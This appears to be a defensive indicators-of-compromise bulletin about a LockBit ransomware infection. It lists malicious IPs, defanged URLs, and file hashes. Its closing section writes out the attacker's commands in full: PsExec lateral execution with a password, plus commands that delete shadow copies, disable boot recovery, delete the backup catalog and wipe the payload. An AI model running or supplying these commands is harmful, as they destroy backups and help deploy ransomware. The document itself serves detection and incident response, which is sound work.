These IOCs were identified in association with a “Lockbit” ransomware infection. As additional information is developed it will be incorporated in a follow-on bulletin.

Malicious IPs

Malicious SSL connections from: 94.177.123.135 7 

VirusTotal engines detected malware coming from this IP: 185.94.111.1 


Malicious IPs (continued)

IPs with at least 1 VirusTotal hit in the last 30 days

5.61.58.15

23.227.38.65

202.173.30.250

35.213.109.249

95.217.64.181

54.249.66.39

52.58.78.16

95.211.189.151

104.47.5.36

104.47.14.33

95.211.189.151

162.250.5.81

74.125.21.139

64.233.177.100

31.13.66.35

64.233.177.100

204.85.32.26

35.212.95.174

151.101.249.140

74.125.136.100

144.76.96.236

173.243.138.98

161.117.125.216

139.224.38.16

194.190.117.32

77.88.21.90

194.190.117.33

217.69.133.145



Malicious URLs (Note: http(s) replaced with hxxp(s)) 

hxxp://cts.hotbar.com/trackedevent.aspx - No available date - Declared malicious by VirusTotal hxxps://web.archive.org/web/20061108171731/http://www.newyorker.com:80/fact/content/articles/031013fa_fa ct - 12/31/2019 - Declared malicious by VirusTotal 



MD5 Hash of Malicious Files 

resources.exe

Malicious File Name (s)

MD5 Hash

bc366664baf8ff887d501fc5b491e5ca
RepMgr.exef24374753619cdf62ab5a480964b275b
$FCAE3AF3.doc2239ee1cafe2ef10448be9a7966ebb5a
Excel.exe92bae235d5526fcd506129cf6a83c870
Readerdc_en_db_cra_install(1).exec3012b659e4d289077b21cd1acb9f6eb
Explorer.exe     4e196cea0c9c46a7d656c67e52e8c7c7
Zoom_71a8493382fd3b8a.exef013b05218ae55da38e7e8bc82471fab




Lockbit Scripts/Files Identified 

Script 1: start PsExec.exe -d @C:\Windows\Temp\list.txt -u [Insert victim agency name].local\[Insert admin name] -p System2017 cmd /c "C:\windows\temp\ [Insert victim agency name].exe" 


Script 2: start PsExec.exe @C:\Windows\Temp\list.txt -u [Insert victim agency name].local\[Insert admin name] -p System2017 cmd /c COPY "\\[Insert targeted IP address]\Windows\Temp\ [Insert victim agency name].exe" "C:\windows\temp\" 


C:\Windows\Temp\list.txt cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog –quiet 


conhost.exe \??\C:\Windows\system32\conhost.exe -xffffffff -ForceV1 

vssadmin.exe vssadmin delete shadows /all /quiet 

wmic.exe wmic shadowcopy delete 

bcdedit.exe & bcdedit /set {default} bootstatuspolicy ignoreallfailures 

bededit.exe bcdedit /set {default} recoveryenabled no 

mmc.exe delete catalog -quiet 


mshta.exe c:\Users\(Current)\Desktop\LockBit-note.hta 


cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 

"C:\Users\Administrator\Documents\[Insert victim agency name]\ [Insert victim agency name].exe" & Del /f /q 

"C:\Users\Administrator\Documents\[Insert victim agency name]\ [Insert victim agency name].exe" 

conhost.exe \??\C:\Windows\system32\conhost.exe -xffffffff -ForceV1 

ping.exe 127.0.0.7 -n 3 

fsutil.exe fsutil file setZeroData offset=0 length=524288 "C:\Users\Administrator\Documents\[Insert victim agency name]\ [Insert victim agency name].exe"